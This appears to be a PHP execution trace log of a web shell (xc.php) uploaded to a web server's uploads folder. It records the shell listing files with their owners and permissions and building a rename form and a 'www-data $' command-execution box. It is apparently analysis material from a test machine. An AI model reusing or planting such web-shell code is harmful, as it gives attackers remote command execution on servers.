3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= '<tr><td><a id="data_link" href="?y=/var/www/html/uploads/data/">[ data ]</a> <form action="?y=/var/www/html/uploads/" method="post" id="data_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="data" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="data" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$full = '/var/www/html/uploads/.htaccess'
4	108	0	0.013298	703944	fileowner	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
4	108	1	0.013314	703992
4	108	R			0
4	109	0	0.013327	703952	posix_getpwuid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	109	1	0.013350	704752
4	109	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	110	0	0.013392	703952	filegroup	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
4	110	1	0.013406	703992
4	110	R			0
4	111	0	0.013419	703952	posix_getgrgid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	111	1	0.013440	704608
4	111	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$owner = 'root<span class="gaya"> : </span>root'
4	112	0	0.013490	703952	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
5	113	0	0.013503	703952	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'.htaccess'
5	113	1	0.013517	704048
5	113	R			'.htaccess'
4	112	1	0.013531	703952
4	112	R			'.htaccess'
4	114	0	0.013545	704176	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
5	115	0	0.013558	704176	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'.htaccess'
5	115	1	0.013572	704272
5	115	R			'.htaccess'
4	114	1	0.013586	704176
4	114	R			'.htaccess'
4	116	0	0.013599	704592	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
5	117	0	0.013612	704592	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'.htaccess'
5	117	1	0.013626	704688
5	117	R			'.htaccess'
4	116	1	0.013639	704592
4	116	R			'.htaccess'
4	118	0	0.013653	704592	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
5	119	0	0.013666	704592	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'.htaccess'
5	119	1	0.013679	704688
5	119	R			'.htaccess'
4	118	1	0.013692	704592
4	118	R			'.htaccess'
4	120	0	0.013706	704720	ukuran	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/.htaccess'
5	121	0	0.013720	704720	filesize	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/.htaccess'
5	121	1	0.013736	704776
5	121	R			64
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$size = 64
4	120	1	0.013760	704736
4	120	R			64
4	122	0	0.013774	704736	get_perms	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/.htaccess'
5	123	0	0.013787	704736	fileperms	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/.htaccess'
5	123	1	0.013801	704776
5	123	R			33188
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mode = 33188
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms = ''
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4	122	1	0.013924	704776
4	122	R			'rw-r--r--'
4	124	0	0.013938	704864	filemtime	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/.htaccess'
4	124	1	0.013952	704904
4	124	R			1676242950
4	125	0	0.013965	704864	date	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'd-M-Y H:i'	1676242950
4	125	1	0.013997	705192
4	125	R			'12-Feb-2023 18:02'
4	126	0	0.014012	704992	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
5	127	0	0.014025	704992	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'.htaccess'
5	127	1	0.014039	705088
5	127	R			'.htaccess'
4	126	1	0.014053	704992
4	126	R			'.htaccess'
4	128	0	0.014066	704992	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
5	129	0	0.014079	704992	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'.htaccess'
5	129	1	0.014093	705088
5	129	R			'.htaccess'
4	128	1	0.014106	704992
4	128	R			'.htaccess'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= '<tr><td><a id=".htaccess_link" href="?y=/var/www/html/uploads/&amp;view=/var/www/html/uploads/.htaccess">.htaccess</a> <form action="?y=/var/www/html/uploads/" method="post" id=".htaccess_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value=".htaccess" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value=".htaccess" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" '
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$full = '/var/www/html/uploads/prepend.php'
4	130	0	0.014158	708072	fileowner	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
4	130	1	0.014175	708096
4	130	R			0
4	131	0	0.014188	708056	posix_getpwuid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	131	1	0.014211	708856
4	131	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	132	0	0.014253	708056	filegroup	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
4	132	1	0.014268	708096
4	132	R			0
4	133	0	0.014280	708056	posix_getgrgid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	133	1	0.014302	708712
4	133	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$owner = 'root<span class="gaya"> : </span>root'
4	134	0	0.014351	708056	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
5	135	0	0.014365	708056	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'prepend.php'
5	135	1	0.014380	708152
5	135	R			'prepend.php'
4	134	1	0.014394	708056
4	134	R			'prepend.php'
4	136	0	0.014416	708280	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
5	137	0	0.014429	708280	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'prepend.php'
5	137	1	0.014444	708376
5	137	R			'prepend.php'
4	136	1	0.014458	708280
4	136	R			'prepend.php'
4	138	0	0.014472	708696	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
5	139	0	0.014485	708696	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'prepend.php'
5	139	1	0.014499	708792
5	139	R			'prepend.php'
4	138	1	0.014512	708696
4	138	R			'prepend.php'
4	140	0	0.014525	708696	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
5	141	0	0.014542	708696	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'prepend.php'
5	141	1	0.014557	708792
5	141	R			'prepend.php'
4	140	1	0.014570	708696
4	140	R			'prepend.php'
4	142	0	0.014584	708824	ukuran	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/prepend.php'
5	143	0	0.014598	708824	filesize	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/prepend.php'
5	143	1	0.014614	708888
5	143	R			57
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$size = 57
4	142	1	0.014639	708848
4	142	R			57
4	144	0	0.014652	708848	get_perms	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/prepend.php'
5	145	0	0.014667	708848	fileperms	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/prepend.php'
5	145	1	0.014681	708888
5	145	R			33261
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mode = 33261
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms = ''
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4	144	1	0.014800	708888
4	144	R			'rwxr-xr-x'
4	146	0	0.014814	708976	filemtime	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/prepend.php'
4	146	1	0.014828	709016
4	146	R			1676242950
4	147	0	0.014842	708976	date	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'd-M-Y H:i'	1676242950
4	147	1	0.014873	709304
4	147	R			'12-Feb-2023 18:02'
4	148	0	0.014888	709104	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
5	149	0	0.014902	709104	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'prepend.php'
5	149	1	0.014917	709200
5	149	R			'prepend.php'
4	148	1	0.014931	709104
4	148	R			'prepend.php'
4	150	0	0.014945	709104	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
5	151	0	0.014958	709104	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'prepend.php'
5	151	1	0.014972	709200
5	151	R			'prepend.php'
4	150	1	0.014986	709104
4	150	R			'prepend.php'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= '<tr><td><a id="prepend.php_link" href="?y=/var/www/html/uploads/&amp;view=/var/www/html/uploads/prepend.php">prepend.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="prepend.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="prepend.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="prepend.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class='
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$full = '/var/www/html/uploads/xc.php'
4	152	0	0.015037	708072	fileowner	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
4	152	1	0.015053	708080
4	152	R			1000
4	153	0	0.015066	708040	posix_getpwuid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	1000
4	153	1	0.015098	708856
4	153	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$name = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	154	0	0.015142	708056	filegroup	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
4	154	1	0.015156	708096
4	154	R			1000
4	155	0	0.015169	708056	posix_getgrgid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	1000
4	155	1	0.015200	708712
4	155	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$group = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$owner = 'osboxes<span class="gaya"> : </span>osboxes'
4	156	0	0.015256	708072	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
5	157	0	0.015270	708072	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'xc.php'
5	157	1	0.015284	708168
5	157	R			'xc.php'
4	156	1	0.015298	708072
4	156	R			'xc.php'
4	158	0	0.015312	708296	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
5	159	0	0.015325	708296	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'xc.php'
5	159	1	0.015340	708392
5	159	R			'xc.php'
4	158	1	0.015353	708296
4	158	R			'xc.php'
4	160	0	0.015367	708712	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
5	161	0	0.015380	708712	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'xc.php'
5	161	1	0.015394	708808
5	161	R			'xc.php'
4	160	1	0.015407	708712
4	160	R			'xc.php'
4	162	0	0.015421	708712	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
5	163	0	0.015434	708712	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'xc.php'
5	163	1	0.015448	708808
5	163	R			'xc.php'
4	162	1	0.015461	708712
4	162	R			'xc.php'
4	164	0	0.015474	708712	ukuran	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/xc.php'
5	165	0	0.015487	708712	filesize	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/xc.php'
5	165	1	0.015503	708776
5	165	R			14428
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$size = 14428
5	166	0	0.015528	708736	round	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	14.08984375	2
5	166	1	0.015543	708808
5	166	R			14.09
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$size = 14.09
4	164	1	0.015569	708776
4	164	R			'14.09 kb'
4	167	0	0.015583	708864	get_perms	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/xc.php'
5	168	0	0.015597	708864	fileperms	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/xc.php'
5	168	1	0.015611	708904
5	168	R			33204
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mode = 33204
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms = ''
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= '-'
4	167	1	0.015729	708904
4	167	R			'rw-rw-r--'
4	169	0	0.015743	708992	filemtime	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/xc.php'
4	169	1	0.015757	709032
4	169	R			1676242950
4	170	0	0.015770	708992	date	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'd-M-Y H:i'	1676242950
4	170	1	0.015802	709320
4	170	R			'12-Feb-2023 18:02'
4	171	0	0.015818	709120	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
5	172	0	0.015831	709120	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'xc.php'
5	172	1	0.015846	709216
5	172	R			'xc.php'
4	171	1	0.015859	709120
4	171	R			'xc.php'
4	173	0	0.015873	709120	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
5	174	0	0.015886	709120	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'xc.php'
5	174	1	0.015904	709216
5	174	R			'xc.php'
4	173	1	0.015917	709120
4	173	R			'xc.php'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= '<tr><td><a id="xc.php_link" href="?y=/var/www/html/uploads/&amp;view=/var/www/html/uploads/xc.php">xc.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="xc.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="xc.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="xc.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit" name'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= '</table>'
3	45	1	0.015985	704752
3	45	R			' <form action="?y=/var/www/html/uploads/&amp;x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff = ' <form action="?y=/var/www/html/uploads/&amp;x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2	8	1	0.016221	712544
1	3	1	0.016257	554320
			0.016318	462696
TRACE END   [2023-02-12 21:02:56.159780]

